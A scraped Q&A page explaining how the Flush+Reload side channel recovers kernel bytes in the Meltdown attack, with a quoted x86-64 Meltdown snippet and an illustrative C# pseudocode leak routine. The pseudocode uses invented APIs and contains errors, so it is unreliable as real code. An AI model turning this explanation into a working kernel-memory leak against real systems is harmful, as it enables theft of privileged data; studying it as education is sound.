Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

How can I find out which cache line is touched by an instruction on an Intel processor?

Tags:

caching

x86

I read the article about the Meltdown/Spectre exploit that allow reading privileged data from the kernel using hardware bugs in the CPU. It says:

The trick is to line up instructions in a normal user process that cause the processor to speculatively fetch data from protected kernel memory before performing any security checks. The crucial Meltdown-exploiting x86-64 code can be as simple as...

; rcx = kernel address
; rbx = probe array
retry:
  mov al, byte [rcx]
  shl rax, 0xc
  jz retry
  mov rbx, qword [rbx + rax]

Trying to fetch a byte from the kernel address as a user process triggers an exception – but the subsequent instructions have already been speculatively executed out of order, and touch a cache line based on the content of that fetched byte.

An exception is raised, and handled non-fatally elsewhere, while the out-of-order instructions have already acted on the content of the byte. Doing some Flush+Reload magic on the cache reveals which cache line was touched and thus the content of the kernel memory byte. Repeat this over and over, and eventually you dump the contents of kernel memory.

Can someone explain how is this Flush+Reload magic is done and how can it reveal the touched cache line?

like image 850
Calmarius Avatar asked Jan 04 '18 14:01

Calmarius


People also ask

What is cache line in CPU?

When the processor accesses a part of memory that is not already in the cache it loads a chunk of the memory around the accessed address into the cache, hoping that it will soon be used again. The chunks of memory handled by the cache are called cache lines. The size of these chunks is called the cache line size.

Which cache on the CPU is used first?

L1 (Level 1) cache is the fastest memory that is present in a computer system. In terms of priority of access, the L1 cache has the data the CPU is most likely to need while completing a certain task.

What is an instruction cache?

The instruction cache contains predecode bits to demarcate individual instructions to improve decode speed. One of the challenges with the IA-32 and Intel 64 ISA is that instructions are variable in length. In other words, the size of the instruction is not known until the instruction has been partially decoded.

What is cache line alignment?

Typically a cache line is 32 bytes long and it is aligned to a 32 byte offset. First a block of memory, a memory line, is loaded into a cache line. This cost is a cache miss, the latency of memory. Then, after loading, bytes within a cache line can be referenced without penalty as long as it remains in the cache.


1 Answers

// Further down, there is pseudocode in C# that shows the complete process.

We have a kernel address rcx which is the address of one byte (let's call the value of that byte "X") in kernel memory space that we want to leak. The currently running user process is not allowed to access this address. An exception will be thrown when doing so.

We have the probe array with the size 256 * 4096 bytes in user space which we can freely access. So, this is just some normal array which is exactly 256 pages long. The size of one page is 4096 bytes.

First, a flush operation is executed (First part of "Flush+Reload"). This tells the processor to completely clear the L1 cache. So, no memory page is cached in the L1 cache. (We don't see that in the code in the OP)

Then we execute the code mentioned in the OP.

mov al, byte [rcx]

We read the byte value X at the kernel address that we want to leak and store it in the rax register. This instruction will trigger an exception because we are not allowed to access this memory address from user level code.

However, because the test whether we are allowed to access this address takes some time, the processor will already start executing the following statements. So, we have the byte value X that we want to know stored in the rax register for these statements.

shl rax, 0xc

We multiply this secret value X with 4096 (The page size).

mov rbx, qword [rbx + rax]

Now we add the calculated value in the rax register to the start of our probe array and get an address that points into the Xth page within the memory space that makes up our probe array.

Then we access the data at that address, which means that the Xth page of the probe array is loaded into the L1 cache.

Now, the L1 cache is empty (because we have cleared it before explicitly) except for two pages that are in the cache:

  1. The page within Kernel memory that contains X (But that we can still not access)
  2. The Xth. page within our probe array

Now, the second part of "Flush+Reload" begins. One after the other, we read each page in the probe array, measuring the time that takes. So, altogether, we load 256 pages. 255 of these page loads will be rather slow (because the associated memory is not in the L1 cache yet), but one load (that of the Xth page) will be quite fast (because it was in the L1 cache before).

Now, because we find that loading the Xth page was fastest, we know that X is the value that is at the kernel address that we wanted to leak.

From the meltdown paper, this is the graphic showing the time measurements of loading the pages within the probe array:

enter image description here

In this case, X was 84.


Pseudocode in C# that shows the complete process:

public unsafe byte LeakByte(IntPtr kernelAddress)
{
    const int PAGE_SIZE = 4096;

    // Make probe array
    byte[] probeArray = new byte[256 * PAGE_SIZE];

    // Clear cash
    Processor.ClearL1Cache();

    try
    {
        // mov al, byte [rcx]
        // This will throw an exception because we access illegal memory
        byte secret = *((byte*)kernelAddress.ToPointer());

        // Note that although the previous line logically 
        // throws an exception, 
        // the following code is still executed internally 
        // in the processor before the exception is 
        // actually triggered

        // Although the following lines are executed, any assignments 
        // to variables are discarded by the processor at the time the 
        // exception is then actually thrown.

        // shl rax, 0xc
        int pageOffset = secret * PAGE_SIZE;

        // mov rbx, qword [rbx + rax]
        // This moves the page with number secret into the L1 cache.
        int temp = probeArray[pageOffset];
    }
    catch
    {
        // Ignore Exception
    }

    // Now meassure time for accessing pages
    int bestTime = int.MaxValue;
    byte bestPage = 0;

    for(int i=0; i<= 255, i++)
    {
        int startTime = DateTime.NowInNanoSeconds;
        int temp = probeArray[i * PAGE_SIZE];
        int endTime = DateTime.NowInNanoSeconds;

        int timeTaken = endTime - startTime;
        if(timeTaken < bestTime)
        {
            bestTime = timeTaken;
            bestPage = (byte)i;
        }

    }

    // Fastest page was loaded from Cache and is the leaked secret
    return bestPage;
}
like image 161
NineBerry Avatar answered Sep 20 '22 11:09

NineBerry